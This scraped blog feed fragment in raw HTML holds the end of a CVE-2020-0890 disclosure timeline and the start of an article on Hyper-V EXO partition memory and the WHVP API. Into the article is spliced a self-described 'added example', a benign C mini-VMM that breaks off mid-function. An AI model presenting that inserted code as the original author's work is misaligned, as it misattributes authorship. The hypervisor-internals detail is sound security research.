font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">27 August 2020 – MSRC message – «Our team has completed a fix for this issue, and we plan on releasing it as part of the September Update Tuesday, assuming there are no issues during the next few weeks of testing. 
We have assigned CVE-2020-0890 to this issue».</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">31 August 2020 – MSRC bounty program message: «So the first report was sent to us months before we received you submission».</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">08 September 2020 – <a href="https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0890" target="_blank">CVE-2020-0890</a> was published.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I still don’t believe in «sent to us months before», because the bug was not patched in Windows Insider builds )</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A very dark story. 
It looks like the program manager did not pass some information to the developer team.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Update: According to </span><a href="https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0890" style="font-size: 10.6667px; white-space: pre-wrap;" target="_blank">CVE-2020-0890</a><span style="font-size: 10.6667px; white-space: pre-wrap;">, the vulnerability was discovered by another researcher first, but it was present in Windows 10 build 1803 (April 2018). It means that the vulnerability was present for 2.5 years, was discovered by another researcher, but was patched within 18 days of my report. You can independently calculate the probability of such events )</span><span style="font-size: small; white-space: pre-wrap;"> </span></p></span>Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-59783227137138080502020-06-19T13:49:00.000-07:002020-06-19T13:49:44.363-07:00Hyper-V memory internals. EXO partition memory access<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="font-family: "calibri" , sans-serif; font-size: 8pt; text-align: left;"> <b> </b> Software used in the article (operating systems have June 2020 patches):</span></div>
<div>
<div style="text-align: center;">
<span style="font-family: "calibri" , sans-serif; font-size: 8pt; text-align: left; text-indent: 35.4pt; white-space: pre-wrap;"><br /></span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10 20H1, build 19041 x64</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10 1803 x64</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMware Workstation 20H2 preview</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VirtualBox 6.1.8</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">LiveCloudKd</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Process Hacker</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PyKd plugin for WinDBG</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG Preview</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> The testing lab runs on an Intel-based PC. Therefore, Intel-specific Hyper-V terms (hvix64.exe) will be used throughout the article. By the way, Windows 10 20H2 preview from build 19640 supports nested AMD virtualization (</span><a href="https://techcommunity.microsoft.com/t5/virtualization/amd-nested-virtualization-support/ba-p/1434841" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://techcommunity.microsoft.com/t5/virtualization/amd-nested-virtualization-support/ba-p/1434841</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), so it looks like more PCs will be running with Hyper-V.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<div style="text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Terms and definitions:</span></div>
</div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WDAG – </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Defender Application Guard (</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">MDAG</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Microsoft Defender Application Guard in newer Windows versions);</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Full VM (virtual machine)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – a virtual machine created in Hyper-V Manager, as opposed to a WDAG container, Windows Sandbox or a Docker container in Hyper-V isolation mode;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Root OS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – the operating system in which the host (server) part of Hyper-V runs;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest OS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – an operating system running under Hyper-V that uses the virtual devices presented by the Hyper-V infrastructure. It can be a Full VM, a Hyper-V container or a WHVP-based VM;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">TLFS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Hypervisor Top-Level Functional Specification 6.0;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GPA (guest physical address)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Guest OS physical memory address;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SPA (system physical address)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Root OS physical memory address;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercall</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – a hypervisor service function, invoked by executing the vmcall instruction with the hypercall number (call code) specified;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VBS – </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Virtualization Based Security;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VPN –</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> virtual page number;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GPN</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – guest page number;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EXO-partition</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – the partition object created when a virtual machine is run through the Windows Hypervisor Platform API;</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
<li dir="ltr" style="background-color: transparent; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; margin-left: 3.3pt; vertical-align: baseline;"><div dir="ltr" role="presentation" style="color: black; font-family: "noto sans symbols", sans-serif; font-size: 8pt; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-decoration-line: none;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WHVP API</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Windows Hypervisor Platform API.</span></div>
</div>
<div style="text-align: left;">
<span style="font-family: "noto sans symbols" , sans-serif; font-size: 10.6667px;"><br /></span></div>
</li>
</ul>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<div style="text-align: left;">
<div style="text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Intro</span></div>
</div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Hyper-V virtualization platform, developed by Microsoft, appeared a long time ago: the first report about it was given at the WinHEC conference in 2006, and the platform was integrated into Windows Server 2008. At first Microsoft shared the API descriptions rather willingly (they were even present in the Microsoft Windows SDK 7.0), but then its policy changed, and official information about Hyper-V interfaces became scarcer and scarcer, remaining only in the Hypervisor Top Level Functional Specification, which is provided for developers of operating systems who want to make their OS compatible with Hyper-V. The problem arose after Microsoft introduced Virtualization Based Security (VBS) in Windows 10: its components (Device Guard, Code Integrity and Credential Guard) use Hyper-V to protect critical components of the operating system even when no guest OS is started. It turned out that existing virtualization systems such as Qemu, VirtualBox and VMware Workstation cannot work in such conditions when they use hardware virtualization features: once running, Hyper-V simply blocked them.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VBS appeared in Windows 10 build 1511 Enterprise (November 2015). It had to be enabled explicitly as a Windows feature option, but in build 1607 the VBS component was already integrated into the OS by default (</span><a href="https://docs.microsoft.com/ru-ru/windows/security/identity-protection/credential-guard/credential-guard-manage" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/ru-ru/windows/security/identity-protection/credential-guard/credential-guard-manage</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) and only needed to be activated. 
At the next stage, in December 2019, Microsoft decided to enable VBS by default (</span><a href="https://techcommunity.microsoft.com/t5/virtualization/virtualization-based-security-enabled-by-default/ba-p/890167" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://techcommunity.microsoft.com/t5/virtualization/virtualization-based-security-enabled-by-default/ba-p/890167</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), which broke the virtualization applications created by third-party developers.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To solve that problem, Microsoft developed the Windows Hypervisor Platform API (</span><a href="https://docs.microsoft.com/en-us/virtualization/api/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/virtualization/api/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), which provides the following features to third-party developers:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1. Creation and management of Hyper-V “partitions”;</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2. Memory management for each partition;</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3. Management of Hyper-V virtual processors.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The main point of these APIs is to provide the ability to manage processor resources, read/write register values, start/stop virtual processors and inject interrupts. The result is a bare minimum for working with a virtual partition.</span></div>
</div>
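<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Here is an added example that is not code from the original article or from Microsoft: a minimal user-mode VMM written against the three API areas listed above. It creates a partition with one virtual processor, maps a single host page at GPA 0 holding a constructed real-mode guest program (mov al, 0x2A; out 0x80, al; hlt), runs it, emulates the resulting I/O-port exit by recording the write and stepping over the instruction, and stops at the HLT exit. The WHv* functions, register names and exit reasons are the documented WHVP API; guest_code, vm_exit, vmm_state, vmm_handle_exit and run_whvp_guest are names this example introduces. The exit dispatch is kept in a platform-neutral vmm_handle_exit() so that it compiles on any host; run_whvp_guest() and main() are compiled only on Windows with the Windows Hypervisor Platform feature enabled and link against WinHvPlatform.lib.</span></div>
</div>

```c
/* Minimal WHVP user-mode VMM (added example): one partition, one VP, one page of RAM.
 * Build on Windows with the Windows Hypervisor Platform feature enabled (MSVC):
 *   cl whvp_hello.c WinHvPlatform.lib
 * vmm_handle_exit() is platform-neutral; only run_whvp_guest() and main() need Windows. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#include <WinHvPlatform.h>
#pragma comment(lib, "WinHvPlatform.lib")
#endif

/* Constructed 16-bit real-mode guest program, loaded at GPA 0. */
const uint8_t guest_code[] = {
    0xB0, 0x2A,  /* mov al, 0x2A */
    0xE6, 0x80,  /* out 0x80, al  -> WHvRunVpExitReasonX64IoPortAccess */
    0xF4         /* hlt           -> WHvRunVpExitReasonX64Halt */
};

enum exit_kind { EXIT_IO_WRITE, EXIT_HALT, EXIT_OTHER };
/* Platform-neutral view of one VM exit: the faulting instruction's RIP and length
 * (an emulated instruction must be stepped over) plus the OUT operands, if any. */
struct vm_exit { enum exit_kind kind; uint64_t rip; uint8_t insn_len; uint16_t port; uint8_t value; };
/* What the VMM remembers: where to resume the VP and what the guest wrote. */
struct vmm_state { uint64_t next_rip; uint16_t last_port; uint8_t last_value; int io_writes; };

/* Emulates one exit. Returns 1 to resume the VP at s->next_rip, 0 to stop. */
int vmm_handle_exit(struct vmm_state *s, const struct vm_exit *e)
{
    s->next_rip = e->rip;
    switch (e->kind) {
    case EXIT_IO_WRITE:   /* OUT was trapped: record it, then step over the instruction */
        s->last_port = e->port; s->last_value = e->value; s->io_writes++;
        s->next_rip = e->rip + e->insn_len;
        return 1;
    case EXIT_HALT:       /* guest is done */
        s->next_rip = e->rip + e->insn_len;
        return 0;
    default:              /* unmapped GPA, triple fault, ...: stop rather than spin */
        return 0;
    }
}

#ifdef _WIN32
#define CHECK(call) do { HRESULT h_ = (call); if (FAILED(h_)) { \
    fprintf(stderr, #call " failed: 0x%08lx\n", (unsigned long)h_); return -1; } } while (0)
/* Creates the partition, maps the page, runs the guest until HLT. Returns 0 on success. */
int run_whvp_guest(struct vmm_state *s)
{
    WHV_CAPABILITY cap; UINT32 written;
    CHECK(WHvGetCapability(WHvCapabilityCodeHypervisorPresent, &cap, sizeof(cap), &written));
    if (!cap.HypervisorPresent) { fprintf(stderr, "Hyper-V / WHPX not enabled\n"); return -1; }
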